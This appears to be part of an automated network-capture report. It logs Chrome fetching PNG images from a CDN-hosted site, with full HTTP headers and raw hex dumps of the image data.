                                                                                                                                                          2024-06-09 22:41:10 UTC16384INData Raw: 8e af 78 3d 87 6e 79 39 e0 e3 94 8f 90 3e 95 13 8d b1 11 f3 15 c4 39 8b e7 fb 48 a9 28 cb 6a 51 52 77 ce d5 84 95 5a 53 96 25 e3 f1 98 fd fd 7d 82 20 a0 28 8a ab 95 47 a5 40 48 fc d0 63 3a 4b d1 52 d6 41 75 13 78 6a 5d af a1 73 50 99 0a d1 fc 6e a5 14 ce 42 af df 7d c1 bd f7 de fb e8 cf ff fc cf 3f 7c ad 6f 3d e7 31 b1 d6 2e aa 9e cf 76 7d 3e 44 eb c0 8f 26 c3 01 fd b5 03 bc f2 ab 5f cb 6f fe f7 b7 b2 33 d8 a3 d3 6a e3 7b 01 a6 34 48 e7 70 38 ac 75 b5 9b 6d 6d 93 ab b6 54 56 92 1b c1 d2 da 01 82 b8 55 e3 32 a8 2d ee b3 b5 17 cd 5d 04 f7 09 4a f0 65 59 e3 38 a4 54 8c 46 43 8a a2 60 6d 6d 8d 34 cd f0 bc da 3a c3 d5 2e 0f d5 58 a2 ba c3 bd 1e c3 2c 44 bd 39 aa aa 44 6b 6f e1 b6 18 53 e2 d5 3c 25 d7 05 36 c6 d4 41 96 b1 16 af b1 36 d6 18 fc a6 d7 b0 df eb d1
                                                                                                                                                          Data Ascii: x=ny9>9H(jQRwZS%} (G@Hc:KRAuxj]sPnB}?|o=1.v}>D&_o3j{4Hp8ummTVU2-]JeY8TFC`mm4:.X,D9DkoS<%6A6
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: c7 f4 d4 49 92 d5 59 a6 c4 b4 d2 a4 2d 44 69 28 cf 3a 43 18 f8 46 80 61 54 ad 12 c6 75 3d cd b1 56 66 8f 8f 3d f6 59 2e 5d ba c4 fb de f7 3e de f3 9e f7 d0 eb f5 b0 2c b3 7d d3 83 8e 3a b9 2b 0f 39 85 a2 98 da bb 24 08 02 2c 4b 99 31 de bc b9 c5 73 cf 3f c7 93 4f 3c c9 a5 4b 97 79 cb 5b de 82 6d db 9c 3d 7b 96 f7 bf ef fd 74 bb 5d 5c d7 65 36 9b d1 eb 75 b8 74 e9 32 8f 3f f9 45 ae 5d bb 46 55 95 5c bd 72 95 2c cf 5a 14 a4 ae 6b 56 57 d5 21 2c 4d 53 76 76 76 78 ea c9 27 f9 d0 87 3e c4 c3 0f 3e 48 12 27 2a d7 b1 db e5 3d ef 7d 2f 17 2e 5c 60 77 77 57 df 85 96 3a 86 4f 11 ae 7a bd 5e 5b 4c 69 aa 6c 20 9a dd 51 48 c5 dd 10 da 1a 59 18 c6 fd a6 94 8e 61 3b 79 dd 64 ed 08 95 79 5e 17 05 ef 79 f7 7b 9e fa cc 63 9f f9 3b c0 7f e7 79 fe 66 92 c4 be 61 08 61 db 16
                                                                                                                                                          Data Ascii: IY-Di(:CFaTu=Vf=Y.]>,}:+9$,K1s?O<Ky[m={t]\e6ut2?E]FU\r,ZkVW!,MSvvvx'>>H'*=}/.\`wwW:Oz^[Lil QHYa;ydy^y{c;yfaa
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: ba a4 86 e7 3a 9d 00 db 52 5f 2b 85 c0 40 91 fa 1b e7 d2 e2 16 18 ae c9 78 59 86 4b 56 7c 75 a8 8c c2 a8 1d a3 87 61 48 ed b8 0c fa 7d 00 e6 f3 39 83 e1 80 d5 95 55 16 8b 05 eb eb 1b 9c 3b 77 8e ed ad 6d a2 38 42 4a a7 a5 ca 86 61 c4 f6 f6 16 47 8f 1c 65 34 1c 21 85 24 8a 23 8a b2 40 0a 89 90 42 59 f8 86 4b fa 83 be 22 43 45 21 b6 6d 29 13 f7 6e 8f 17 9f fc 02 b3 38 63 37 4c 28 dd 80 77 be ef 83 f4 86 1b bc 74 f1 06 ab 9b c7 30 1d 1b cb 76 a8 8d 8a a4 86 24 2b e8 ac ac 23 bc 80 83 c5 02 b1 bf ef 6e ae 6f fc 7f f2 ba fe 36 69 99 f5 6d f1 b3 c6 6b 08 77 bc 6c dd 51 ed 47 a3 7a 6e 24 4f 86 21 f8 b6 df f7 fb df bb ba ba fa 41 a9 cd 19 55 ef 6c 61 5b 16 c2 30 5a c3 f5 46 30 ed 79 1e b6 65 2b a2 14 90 44 f1 6d 5c 8f 56 a8 ab 63 93 8b 5c 91 79 fc c0 d7 41 47 25
                                                                                                                                                          Data Ascii: :R_+@xYKV|uaH}9U;wm8BJaGe4!$#@BYK"CE!m)n8c7L(wt0v$+#no6imkwlQGzn$O!AUla[0ZF0ye+Dm\Vc\yAG%
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: b5 b8 1b 93 93 d3 d0 ca 2f 99 51 0d f2 d4 c0 a4 b6 e8 36 87 40 96 19 48 a1 30 33 37 8f bd 07 0f a3 3d 3d 83 dc 59 ac 6f ac 97 ed 5f 06 c4 80 62 e7 99 74 20 1c 8a bb c5 70 08 fc f3 7f f1 c7 ce 48 7d 0e 4a e4 86 33 90 e0 72 42 81 d8 b2 54 f5 ce d5 60 22 57 b3 04 c4 e8 1a 20 28 51 ce 35 07 41 48 80 5d 0e 93 a7 c8 d2 18 59 32 44 bf d3 85 22 e5 d6 96 d7 63 cb 65 81 29 6f 7e c7 95 c0 f6 0e a8 5f ae 6c 56 3a 20 35 19 a4 00 58 b5 ef 8d fd a9 4f d3 c4 3c 58 49 48 b2 08 3d 8d c9 c9 29 c4 83 21 06 dd 1e 92 61 8c 7e b7 8f 4e a7 83 6e 6f 03 fd 41 17 c9 70 80 7e a7 0b 97 66 b0 49 06 a9 7d ec 3a 72 2d 26 f7 1d 46 06 8d 24 b5 18 74 7b 20 63 20 5c 0e b6 99 f0 14 28 a0 cd 4e ab 0c c0 c0 84 6b 90 f2 dc e4 54 b3 28 46 62 06 b8 d0 bf 8e 3d 38 16 b0 4c 48 b2 14 b6 2c b8 82 10
                                                                                                                                                          Data Ascii: /Q6@H037==Yo_bt pH}J3rBT`"W (Q5AH]Y2D"ce)o~_lV: 5XO<XIH=)!a~NnoAp~fI}:r-&F$t{ c \(NkT(Fb=8LH,
                                                                                                                                                          2024-06-09 22:41:11 UTC7342INData Raw: 1e ca ab 87 f3 b6 cb 4c 8e 03 19 d8 aa a1 c7 cb 54 eb f1 df d1 e1 e9 76 bb fa c1 87 1e f2 8e 1e 39 86 1f fc e0 07 e8 f7 07 c8 b2 1c 87 0f 1f c6 4d 37 df 80 dd 8b f3 b0 c6 82 04 43 2b 3d e2 da ab 64 d0 1f 40 b5 14 7e f0 83 1f b0 92 aa da 97 2a fa 51 8f 70 d4 43 79 d5 b6 19 5c 6c 2b 8f 9d 3e ae 3b 97 ae bc 53 8e 32 af 61 18 5e 94 5d ad 9a 95 4b de bf 57 bc 52 ef 8a 83 ba ba 42 07 83 01 0d 87 43 8a e3 18 61 18 52 96 65 d4 6c 36 ab 82 fd 51 a9 29 5e 5c 3b 8e 83 b7 0e b8 17 0b e1 6d 67 a2 6c 97 46 af 5f 00 a8 ad 33 5e c9 57 69 af fa f6 a1 b6 cd f5 c4 cc f8 fe 30 00 8a e3 d8 9d 3c 71 62 f8 f6 b7 bd 13 ce 5a b4 db 6d bc f7 bd ef c5 cd 37 df 8a 2c 4f 60 f2 22 32 a7 4b 1a 84 b2 3d 6b 24 44 84 24 49 38 6a 44 5c 26 97 ea f1 e9 2a 8c 57 01 1c b5 df ae fe 57 a6 43 7d
                                                                                                                                                          Data Ascii: LTv9M7C+=d@~*QpCy\l+>;S2a^]KWRBCaRel6Q)^\;mglF_3^Wi0<qbZm7,O`"2K=k$D$I8jD\&*WWC}


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          347192.168.2.55011390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC372OUTGET /pc/image-pc/index/312/app/02.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:10 UTC627INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 98341
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:25 GMT
                                                                                                                                                          ETag: "5d71fe69-18025"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[2],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE10[13],EU-GER-frankfurt-GLOBAL1-CACHE4[0,TCP_HIT,11],1.1 google
                                                                                                                                                          X-CCDN-Expires: 1698781
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 390a65412377c7abc969536a653da164
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 893226
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:10 UTC15757INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 14 00 00 01 a2 08 06 00 00 00 26 e3 39 11 00 00 20 00 49 44 41 54 78 5e ec bd 07 98 5d 67 75 2e fc ee de 4e 3f 67 fa 68 66 24 8d ba 2c d9 b2 2d b9 ca 72 37 36 60 8c 0b 09 26 c4 80 c1 14 73 a9 26 24 fc 01 51 f2 98 40 92 9f 40 08 89 73 13 e0 9a 40 62 93 42 0f 86 60 d9 b8 77 cb 96 6c f5 19 4d 9f d3 db ee e5 3e eb db 33 d8 86 70 03 79 90 64 89 b3 fd cc 73 3c 9a 33 7b 9f 59 df de ef b7 d6 bb de b5 16 87 ce 71 42 59 60 fb db de a6 63 ef 5e 77 6d 57 57 f4 e3 6c 96 ef bf ed b6 60 3b 10 9e 50 7f 64 e7 8f 79 d9 5a 80 7b d9 7e b2 ce 07 fb 95 2d 70 fd f5 af 48 b9 6e a2 3d 34 24 66 0d 51 b9 3e 97 cb a9 12 27 cc 14 e7 ab cb 74 bd b0 ab 52 ac ff 38 b5 64 09 5f 79 ee 39 fb cf 6e bf bd fd 2b 9f b8 f3 c6 8e 05 7e 4d
                                                                                                                                                          Data Ascii: PNGIHDR&9 IDATx^]gu.N?ghf$,-r76`&s&$Q@@s@bB`wlM>3pyds<3{YqBY`c^wmWWl`;PdyZ{~-pHn=4$fQ>'tR8d_y9n+~M
                                                                                                                                                          2024-06-09 22:41:10 UTC16384INData Raw: 84 07 ee 7f 1a 92 42 82 48 05 6b 57 ad c4 3b df f1 56 0c f5 77 43 55 38 84 6e 0b 87 c7 0f 60 e7 fe 89 d6 a4 27 7f f8 e6 8f 7d e9 8b bf d5 80 52 6d b9 27 97 7c e9 1b c5 9a bd 9a 76 98 c1 41 19 73 95 38 0b 41 3a 2c 72 a9 19 57 42 61 2e 29 3d 22 1a 40 1e 32 ce 84 b2 2c 61 c0 b1 f4 2a dd 58 8a 46 a1 50 fc 7e ca 34 0c e8 40 81 78 05 3b 64 ed 11 69 17 ff 65 b2 7c da 8c 68 1d 5f a4 40 87 42 9a a2 08 b8 fd ab 77 e0 4b 7f f3 45 1c 3e 3c 06 db 21 ee c4 61 29 50 12 23 f5 76 e9 c8 77 65 18 79 49 ed 1a 4b f5 16 6a 2d 60 60 e5 2a bc f6 8d ef c4 35 6f 7c 27 38 55 c4 e4 81 32 d6 74 e5 90 16 23 96 89 d1 35 0b 73 c5 9d ac 6e 27 a5 2d 81 26 67 20 68 32 10 b5 e0 85 35 96 e5 41 90 01 8f 34 04 4e 00 85 81 56 04 b4 42 e2 96 80 32 b5 6f a4 b0 86 6e 56 39 f6 50 64 2d fe fc b4 cb
                                                                                                                                                          Data Ascii: BHkW;VwCU8n`'}Rm'|vAs8A:,rWBa.)="@2,a*XFP~4@x;die|h_@BwKE><!a)P#vweyIKj-``*5o|'8U2t#5sn'-&g h25A4NVB2onV9Pd-
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: ec f3 c1 21 ba a1 6b 3c a6 a6 72 48 e6 ab e8 d9 37 8a 9e 7d fd 48 a4 52 08 d5 45 50 5f 5f 77 e3 af 1f 79 f4 9b 6f 1a b9 bc cd ef ee b1 0d 3b 7e 24 b8 23 97 9a 0e 3f b7 63 df 10 c6 62 d3 98 37 6f 01 3c 8a 8c 90 5d 42 77 8b 0d 6e 03 e0 c8 98 da ac d4 0c 9f ff 44 41 a9 bd 35 19 14 51 60 ba c9 a6 27 f9 5c 06 57 5e 71 19 36 6d dd 82 b2 e4 c2 79 17 5c 8c 8b 3e 71 35 36 bd f4 12 be f3 f5 6b 10 f2 28 28 5b 02 8e 3f e5 34 9c f3 ee 7f 04 2f 8a 88 47 c7 f0 b3 fb ff 13 7d 7d 3b 58 f7 b0 60 f1 51 b8 e3 8e bb b0 78 8e 8f b9 d7 c5 c6 13 c8 65 f2 ac 1b a1 30 70 2a 2a 54 dc 78 96 fb cb c1 d2 2d 18 26 a9 99 0c 54 38 01 93 05 1d c3 c9 02 aa 52 00 f1 8c 0a b5 48 e9 83 24 46 ac 09 2f 39 49 84 5b b4 d0 e6 93 51 22 2c 6b ba 88 50 28 80 a6 7a 11 c3 a3 a3 d8 33 92 46 53 c8 57 71
                                                                                                                                                          Data Ascii: !k<rH7}HREP__wyo;~$#?cb7o<]BwnDA5Q`'\W^q6my\>q56k(([?4/G}};X`Qxe0p**Tx-&T8RH$F/9I[Q",kP(z3FSWq
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 3b b4 76 d6 d5 b0 02 a7 00 65 f2 d1 7f cd c6 38 ef 70 3a a2 a6 03 a7 83 fc e2 0c e6 17 97 30 b7 58 c1 f8 05 97 63 a6 6a d9 91 cc ba 9f 7b f5 1b df 78 c7 b3 3f d8 fd 5f fb ec b5 a3 e9 e8 dd e4 e6 55 af d5 51 6a b6 21 c6 fb ff f0 55 bf f4 9b 7f b2 1a 16 81 ae f1 c8 a2 f5 53 56 80 2f d7 5d bf 5f 8e 6a 4c fe d0 e5 3c 96 62 30 9e 08 38 16 95 90 95 85 4d 76 21 81 c7 74 60 09 4c 2a 55 1b d5 96 07 cf e5 19 e7 64 38 a1 61 43 92 c3 f9 c3 02 a3 bc 93 24 0a ed 39 b6 69 7b 00 b5 22 c5 48 67 27 d0 62 1a 25 9e 0b c7 ea 9e e2 a9 b4 79 0d 87 8b 36 aa 2e 0f dd 10 e0 07 1e f3 39 0e c5 91 02 06 28 9d 36 89 5f 53 8a 42 5f 3d 50 1f 97 c9 20 44 05 36 b4 a7 8a 01 2b 0c 0f 1b 22 6b 65 33 35 a7 15 b9 82 e0 69 a5 bd d3 ef 13 73 f8 58 19 12 ec d8 90 0c 19 c5 36 f0 c4 89 25 54 fc 00
                                                                                                                                                          Data Ascii: ;ve8p:0Xcj{x?_UQj!USV/]_jL<b08Mv!t`L*Ud8aC$9i{"Hg'b%y6.9(6_SB_=P D6+"ke35isX6%T
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: f6 90 1e aa 98 e2 0d 05 05 d5 23 b0 52 be cb 8d 71 24 1f 07 cc d2 07 cb 26 7c 1c a0 10 c1 4e 11 15 46 98 70 44 46 67 47 3b 4e 3b ed 54 bc fd d6 6c 94 45 aa 70 c7 fd f7 61 b7 dd 26 e2 dc b3 cf c7 3d f7 dc 83 d3 ce fa 39 ae bc e6 77 88 75 a4 38 ba fb f7 3d 77 63 ec e8 26 54 57 86 f1 d2 cc e7 30 e3 e1 e9 7f ee 9a bb e0 92 d5 40 49 b6 60 f3 c5 85 4d 3e b2 21 0f 28 34 72 47 1d b1 df 71 3f 3c 62 f7 7f 8e aa 0b 87 2b 3c 3e 07 50 34 85 01 85 bc 8d e9 29 4d 80 42 dc 10 e2 8b 90 da 3c 2f 7d b8 77 86 a8 f3 85 12 32 3f ea 1d 40 71 9e fa 36 47 27 66 0e 48 24 0d 18 c4 2d b1 33 2c e4 44 f6 3f dd 71 a0 6e 9b dd 50 56 db f4 53 dd a7 ff 6b 93 af 62 e1 83 f3 de 58 74 90 e5 09 3d 14 2a 2b d3 35 3f 49 41 8a 5c be a5 8d 00 c5 35 11 73 a3 14 77 29 e4 b8 f3 0c 98 a9 17 47 28 83
                                                                                                                                                          Data Ascii: #Rq$&|NFpDFgG;N;TlEpa&=9wu8=wc&TW0@I`M>!(4rGq?<b+<>P4)MB</}w2?@q6G'fH$-3,D?qnPVSkbXt=*+5?IA\5sw)G(
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 87 f6 4d e4 a8 7f 34 47 d9 92 4d db 9e dd 42 1d cd 06 9d 79 72 db b5 df ff fc cd df 22 da 68 01 08 01 9e 78 3e 42 71 29 07 02 93 3a c8 1c 45 40 7c 41 13 e8 28 ee cf f1 de f4 e1 8e 87 b4 62 c5 0a 69 d9 39 cb be 9f 88 37 be fd 94 d3 4e a5 86 e6 26 1a 2f 94 49 8f 36 50 b9 e4 90 53 b6 48 23 99 b4 90 44 ba 11 a0 a6 c6 38 f5 0f e4 a8 e7 d9 3d b4 61 f3 26 ea d9 be 85 f4 b0 46 9d 9d b3 69 78 68 3f a9 4e 85 e6 b6 b5 50 98 2a 9f fb c2 17 be b2 12 13 7c 12 1c dc c9 ed 3e 26 a7 f8 e2 c5 8b 0f 69 bf 27 c1 64 13 75 77 77 4f f9 ce b6 6d 6e f1 b4 c5 8b 17 d7 4c 38 20 50 0d ea d0 26 fa db cb af bd 71 e3 86 2d 6f ef 68 9f 47 a7 2f 39 97 66 cd 5f 40 25 3b 40 e9 8c 49 63 39 93 24 3d 42 a9 86 76 aa 14 14 da b1 6b 90 36 ec dc 4b d9 62 89 74 4d a1 68 a8 4c 67 9f 92 a4 25 0b 1a
                                                                                                                                                          Data Ascii: M4GMByr"hx>Bq):E@|A(bi97N&/I6PSH#D8=a&Fixh?NP*|>&i'duwwOmnL8 P&q-ohG/9f_@%;@Ic9$=Bvk6KbtMhLg%
                                                                                                                                                          2024-06-09 22:41:11 UTC664INData Raw: 50 ca e7 d0 b9 6c 9a cf 52 ba 47 64 88 8b 94 1a 64 56 33 7e 21 f3 c3 c3 1f 07 28 80 02 55 a3 8d 9f 03 f0 5d d0 e1 3b a3 4c 72 a3 64 07 68 7c 14 82 74 d2 04 2d f6 bd 53 96 05 76 d7 6b d9 46 59 c2 80 c0 74 6d 23 5e 91 e0 96 3b 98 94 d9 64 32 29 03 9a 79 b8 5e e0 a0 ec ae f4 52 fa 94 7a 4b 31 0c cd 2f 9a c9 4b 8a c3 e3 1f ba bf e7 cf 9f c7 bd bc 7a f5 2a 62 67 69 32 9a 0e 77 01 c1 32 80 59 b6 aa 6f e4 79 9d 3b dd 5f 5e fa 2e e5 98 eb 12 a9 7c 72 8d 5e be 7c 19 0d 3a 35 d0 7c 2e 72 59 1b 3f 4c 74 49 4d ba 1a ba d7 97 8f 30 69 a4 a9 84 0e f6 b8 55 c4 6e ca ba 46 d2 b3 35 a9 1e b7 af fd 97 5f e6 d9 69 be 4e d3 b9 ba 8e db a1 cc 1c 9a c5 7d 05 2c 28 a3 3e 6b ea c7 21 53 ab 4b 56 ed 23 5f 14 07 d0 00 1e 6c 02 88 5f b3 c5 95 71 d3 1e 24 cb 34 92 ca 39 5d 3a e2 05
                                                                                                                                                          Data Ascii: PlRGddV3~!(U];Lrdh|t-SvkFYtm#^;d2)y^RzK1/Kz*bgi2w2Yoy;_^.|r^|:5|.rY?LtIM0iUnF5_iN},(>k!SKV#_l_q$49]:


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          348192.168.2.55011090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC372OUTGET /pc/image-pc/index/312/app/06.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:10 UTC626INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 97993
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 22 Feb 2022 09:18:48 GMT
                                                                                                                                                          ETag: "6214aa78-17ec9"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[2],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE5[24],EU-GER-frankfurt-GLOBAL1-CACHE5[0,TCP_HIT,22],1.1 google
                                                                                                                                                          X-CCDN-Expires: 1698781
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: e6fb3d631d170b2e4941ac9319b462f4
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 893226
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:10 UTC15758INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 8a 00 00 02 c9 08 03 00 00 00 9d 84 94 7d 00 00 03 00 50 4c 54 45 00 00 00 40 44 42 37 3b 39 32 36 33 33 37 33 26 2c 28 33 38 34 1a 24 1d 1f 23 1e 1a 1f 1b 1f 22 1e 19 1c 18 1c 34 2a 1c 1f 1c 18 1a 17 24 29 24 18 1a 17 19 1b 17 17 19 16 af af af 11 13 11 11 13 10 36 3d 37 2b 2f 2b f3 f3 f3 1a 1d 18 ab ac ab 1b 1f 1a 48 49 47 c9 cb c9 f2 f2 f1 da db d9 dd dd db c1 c1 bf ea e9 e8 84 83 7f 9c 9b 96 d5 d4 d2 6d 69 6b 70 6c 62 94 8c 8c c1 bf bb ab a8 a7 ff ff ff fa fb fb f6 f7 f8 f4 f5 f3 ee ef f3 f1 f3 f6 f1 f1 ef ea eb f0 ed ee eb e2 e5 eb e9 ea e8 e6 e8 e3 e6 e8 ee de e1 e9 e0 e2 e3 d9 dd e7 df e3 d8 e3 e6 dd d6 d7 e2 d0 d4 e0 b7 bb cb ab b0 c1 db df d3 c2 c7 d6 b3 b8 c7 bb bf cf af b4 c5 d3 d9 c7 c0
                                                                                                                                                          Data Ascii: PNGIHDR}PLTE@DB7;9263373&,(384$#"4*$)$6=7+/+HIGmikplb
                                                                                                                                                          2024-06-09 22:41:10 UTC16384INData Raw: 02 0b 1d 12 9e de 7f 92 41 9d 6e 77 20 0c 4c 9a 96 b2 e7 65 33 49 60 fc 8c 61 ce 49 64 69 c8 63 c5 43 90 57 49 19 74 89 34 8a 27 94 f2 ac a9 44 90 86 3c e0 82 44 9c 0a 1e 86 f7 0e d7 ee 29 dd de db 9f df 1b c3 92 6d ed f6 ca ec 31 46 7f e3 a0 bb b3 e3 5b 70 ba 47 07 f3 b7 be de 1e eb 8d 94 8e a6 cf dc b8 f1 71 94 c7 dd 6e da 41 9e bb 1e bd 99 d2 d2 c8 cf 9b 67 72 9b 89 96 77 fc 86 b2 76 eb 5d 08 47 c3 b9 b6 60 ac dd 56 74 81 51 ce e0 fe be e4 87 1f 0c 57 87 42 50 65 0a 99 e1 dd 28 0a 3e d8 46 c6 7c dc 09 5e 5c 58 58 e6 e3 c3 4f 45 10 0e 00 05 83 33 23 bd 33 29 c1 13 8f 5d d0 49 44 d4 49 95 e3 49 27 50 38 c1 a8 55 84 e0 2d c7 e7 01 c5 c9 6a fb 34 a1 98 60 48 f5 94 16 30 6c 30 a7 bc 42 6a 1a 04 94 5a 9b f8 a4 10 3e 4f 85 11 9d c4 78 4e 44 1c fc 07 12 b0 02
                                                                                                                                                          Data Ascii: Anw Le3I`aIdicCWIt4'D<D)m1F[pGqnAgrwv]G`VtQWBPe(>F|^\XXOE3#3)]IDII'P8U-j4`H0l0BjZ>OxND
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: ae b1 81 a4 68 a8 af ad af a3 5a ea 0d 21 e8 a2 88 32 b9 20 86 12 09 31 c5 0d f1 b0 80 87 4a 10 8d 15 cd b7 10 02 46 8e 9a f4 72 cd 34 9d 07 2f a0 28 88 4c 13 c0 e8 d9 c2 d1 17 96 42 20 01 77 04 4f b0 1e f6 1b f8 28 36 2e 3d 7b 87 90 4b bc af 07 ef 08 d7 9e 53 85 ed 8b c7 67 87 97 40 0b 5a 0b 09 05 b1 98 1d 9e 76 ae 5f 9a 76 9c 7b de 7f 0e 85 6c 5f 5e b3 02 8a cd 04 42 40 b1 47 89 3b 7d 6d 1f bb 9c ee 7a 78 50 86 2e 1b 5f 43 b0 16 18 10 b6 00 26 3d 2d 8a 89 e1 72 39 ea 99 f7 80 00 08 3c b3 0c 10 16 71 ab cb dd 0f 23 d1 a7 aa 4a 0a 22 bb 5e 86 32 e8 23 93 b3 5b 21 a0 46 c3 c1 78 26 e8 d3 a8 71 04 1b ca a6 01 f5 8f 98 e8 19 94 d5 1e d1 6c 2e 92 19 c2 8e 94 3f 84 14 2c 62 0d 40 61 e0 4e 11 50 4c 20 6a 14 d5 ba 76 0e 3d 65 13 49 21 86 99 64 00 1a 7c 21 01 12
                                                                                                                                                          Data Ascii: hZ!2 1JFr4/(LB wO(6.={KSg@Zv_v{l_^B@G;}mzxP._C&=-r9<q#J"^2#[!Fx&ql.?,b@aNPL jv=eI!d|!
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: a5 b9 fe f8 d5 df 59 ed 4b a3 52 21 53 8e 83 e2 67 90 77 c7 83 85 70 70 81 26 8e 9c 81 a3 f5 99 49 46 6c c9 97 d4 85 88 99 5a c8 e7 f9 e7 17 a4 27 14 06 1f 78 6d 7a 7c f1 c8 12 b7 2e 10 f0 27 96 58 1a 1e be fc 5a 74 7b cf 35 e4 7c b4 93 13 53 33 2b ef 05 8a f7 7c 28 79 e2 ca c2 bc 74 36 6c 31 b0 d4 71 36 fa f1 d5 77 72 45 dc 39 c7 c8 8c 8f 5c 11 50 04 14 e5 e3 0c 9f 95 f7 f5 da 06 02 89 38 da 56 8d 44 2c 48 28 ed d1 2a 9e 0e 28 f1 44 54 13 be c8 53 16 48 2e 45 5b 6d 71 86 d7 2b 30 93 93 de 4e ab ca cd 81 45 0c 8c db cc 61 bd ee 6c 77 f5 a2 d2 94 c4 62 0a 94 1d 10 e8 69 6f f3 0b 6d b8 9a 18 67 4d 47 33 82 b6 81 18 9d 74 b2 e2 2e 7c 27 39 2e 9b 6a 84 12 b8 54 92 a9 d1 40 e0 4f 5a c1 b5 77 83 1f 24 78 4d 32 99 a8 95 7d c8 f0 e1 68 38 be 4a 2b 59 79 af d0 d3
                                                                                                                                                          Data Ascii: YKR!Sgwpp&IFlZ'xmz|.'XZt{5|S3+|(yt6l1q6wrE9\P8VD,H(*(DTSH.E[mq+0NEalwbiomgMG3t.|'9.jT@OZw$xM2}h8J+Yy
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: cb 95 f4 14 b6 8c 72 3a b3 d8 f0 fc f0 c2 2f db d7 ae 5d 5b 5a 39 dc fc aa d8 58 73 7b 45 af 29 ec 94 7e 57 70 6a 04 26 c2 42 e0 b4 59 a0 3f 77 20 17 19 1d 8b 0d 84 bf 78 37 a9 6f 54 ea d7 d2 a6 ae e7 8b c5 bc ae 57 f0 a3 eb 0f a1 b1 a7 8c 94 aa 30 50 10 20 8c a1 87 e3 a3 f7 3e 1e 1a 9f 48 4f 8d 87 35 1f 46 1a dc 8a c2 fb 4d b9 1c 8d cd 8b 34 a3 45 a7 32 62 b7 99 78 95 9d b3 f6 6d 88 6a 55 b5 8f 2e a2 60 92 55 12 19 66 84 c2 b8 bc 97 b9 be 59 8d 15 6f 1a 5a cc 3f 93 79 2f 18 5c d9 de 06 86 a5 6b d7 f0 b1 b2 b9 79 bd b8 e7 ec 15 63 00 bc bd 77 fb 31 f4 62 a2 5f be d7 a0 85 72 aa 39 93 18 35 8e 17 9f a7 91 3b ef f3 d7 a7 92 21 b3 fe fe 93 fa b8 5e 2c 3e 9a 4c 16 21 f9 7c e2 a9 f1 2c 5b de f6 28 2b 5b 64 83 1e ff 87 37 30 12 f7 8d 0e f4 e2 9d 2b ec d3 58 a0
